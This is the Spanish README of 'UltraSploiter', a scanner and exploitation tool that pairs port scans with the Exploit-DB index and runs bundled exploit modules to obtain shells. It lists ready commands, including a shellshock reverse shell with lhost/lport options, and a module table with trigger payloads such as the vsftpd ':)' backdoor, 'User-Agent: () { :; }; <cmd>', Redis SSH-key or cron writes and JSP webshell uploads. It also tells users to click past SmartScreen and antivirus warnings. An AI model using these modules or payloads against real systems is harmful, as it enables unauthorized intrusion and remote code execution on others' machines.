Un único binario que combina un escáner de puertos, el índice completo de Exploit-DB (47k entradas) y módulos de exploit ejecutables en una sola herramienta. Escrito en Rust, funciona en Linux, Windows y macOS.
escanea, empareja, explota — una IP de entrada, shells de salida.
Un único binario que combina un escáner de puertos, el índice completo de Exploit-DB y un conjunto de módulos de explotación ejecutables en una sola herramienta. Funciona en Linux, Windows y macOS.
| tarea | normalmente | aquí |
|---|---|---|
| Encontrar servicios en un host | nmap | UltraSploiter scan <ip> |
| Buscar exploits | searchsploit | UltraSploiter search <kw> |
| Ejecutarlos | msfconsole | UltraSploiter exploit <ip> <module> |

La forma más simple y mejor es simplemente descargar el binario precompilado y ejecutarlo. Nada que instalar, sin dependencias — un único archivo autocontenido.
Descárgalo desde la página de Releases:
UltraSploiter-windows-x86_64.exe → doble clicUltraSploiter-linux-x86_64Aviso: las herramientas de seguridad son marcadas. Windows SmartScreen y el antivirus probablemente advertirán o pondrán en cuarentena el binario — haz clic en Más información → Ejecutar de todas formas, o añade una exclusión si vas a conservarlo.
Haz doble clic en UltraSploiter.exe. El menú se abre.
Si SmartScreen advierte sobre un editor desconocido (lo hará, para cualquier binario sin firmar), haz clic en Más información → Ejecutar de todas formas.
chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64
chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64
Si Gatekeeper lo bloquea (de nuevo, cualquier binario sin firmar), haz clic derecho → Abrir, o elimina la marca de cuarentena una vez:
xattr -d com.apple.quarantine UltraSploiter-macos-arm64
Solo es necesario si no hay un binario para tu plataforma, o si quieres modificarlo. Se requiere Rust 1.74+.
sudo apt install build-essential # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh # -> ./UltraSploiter
xcode-select --install # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh # -> ./UltraSploiter
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1 # -> UltraSploiter.exe
build.ps1 usa el toolchain stable-x86_64-pc-windows-gnu, que enlaza con
MinGW — así que no necesitas Visual Studio ni MSVC. Instala ese toolchain
si falta. Si ya tienes MSVC Build Tools, un simple
cargo build --release también funciona.
Aviso para Windows + GNU:
windows-sys(arrastrado por tokio) invocadlltool, que llama al ensambladoras— y el componente rust-mingw no incluyeas.build.ps1busca un bin de MinGW que lo tenga en%~dp0tools\mingw64\biny%USERPROFILE%\tools\mingw64\bin, y lo antepone aPATHcuando lo encuentra. Coloca una compilación de winlibs allí si encuentraserror calling dlltool. Los toolchains de MSVC no se ven afectados.
Sin argumentos obtienes el menú:
1) Scan a target find open ports and services
2) Search exploits keyword lookup
3) List runnable modules
4) Run an exploit pick a target and a module
5) Console advanced msf-style commands
0) Exit
UltraSploiter scan 10.0.0.5 # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4 # range, fast timing
UltraSploiter scan 10.0.0.5 -p - # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491 # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console
En Linux/macOS, añade el prefijo ./ (p. ej. ./UltraSploiter scan 10.0.0.5).
| flag | significado |
|---|---|
-p <spec> | top (1000), 80,443, 1-1024, - (todos) |
-T0..-T5 | plantilla de temporización — de más lento/silencioso a más rápido/ruidoso |
-sU | escaneo de sondeo UDP |
-sV | detección de servicio/versión (activada por defecto) |
--no-banner | omitir la captura de banners |
--json | JSON a stdout |
-oX <file> | XML estilo nmap |
El escáner es asíncrono (tokio): cada nivel -T establece cuántos sockets están en
vuelo a la vez (hasta 8000 en -T5), por lo que cubre el top-1000 de nmap en un par
de segundos. Cada "abierto" es un handshake TCP completado, así que los resultados son exactos.
-o key=value)| clave | usado por | significado |
|---|---|---|
lhost, lport | módulos de rev-shell | dirección de callback |
rport | módulos web | sobrescribir el puerto HTTP |
path | shellshock, struts, phpunit | ruta del endpoint |
user, pass | tomcat_manager | credenciales del manager |
core | solr_rce | nombre del core de Solr |
file | grafana_lfi | archivo a leer |
ssh_pubkey | redis_unauth | clave a insertar en authorized_keys |
src, dst | proftpd_modcopy | origen / destino de la copia |
timeout | todos | tiempo de espera del socket en segundos |
search e info están respaldados por el índice completo de Exploit-DB — más de 47.000 entradas
(el mismo conjunto de datos que usa searchsploit), incluido en el binario. Cuando una entrada
lleva un CVE que implementa un módulo ejecutable, info enlaza ambos:
$ UltraSploiter info 17491
Exploit-DB 17491
description vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
codes OSVDB-73573;CVE-2011-2523
[runnable] vsftpd_234
UltraSploiter exploit <ip> vsftpd_234
| módulo | CVE | disparador |
|---|---|---|
vsftpd_234 | CVE-2011-2523 | usuario :) → bind shell root en 6200 |
unrealircd_backdoor | CVE-2010-2075 | AB; <cmd> sobre IRC |
distcc_exec | CVE-2004-2687 | argumento del compilador del protocolo DIST |
proftpd_modcopy | CVE-2015-3306 | copia de archivo SITE CPFR/CPTO |
redis_unauth | — | CONFIG SET escribe una clave o entrada de cron |
shellshock | CVE-2014-6271 | User-Agent: () { :; }; <cmd> |
struts2_5638 | CVE-2017-5638 | OGNL en Content-Type |
tomcat_put | CVE-2017-12615 | PUT de un webshell JSP |
tomcat_manager | — | despliega un WAR vía /manager |
elasticsearch_groovy | CVE-2015-1427 | RCE de Groovy en _search |
drupalgeddon2 | CVE-2018-7600 | callback de render de la Form API |
phpunit_eval | CVE-2017-9841 | eval-stdin.php |
jenkins_script | CVE-2019-1003000 | Groovy en /script sin autenticación |
solr_rce | CVE-2019-17558 | plantilla Velocity en stream.body |
grafana_lfi | CVE-2021-43798 | lectura de archivo por path traversal de plugin |
webmin_backdoor | CVE-2019-15107 | password_change.cgi canaliza un valor a un shell |
php_cgi_arg_injection | CVE-2012-1823 | -d auto_prepend_file vía la cadena de consulta |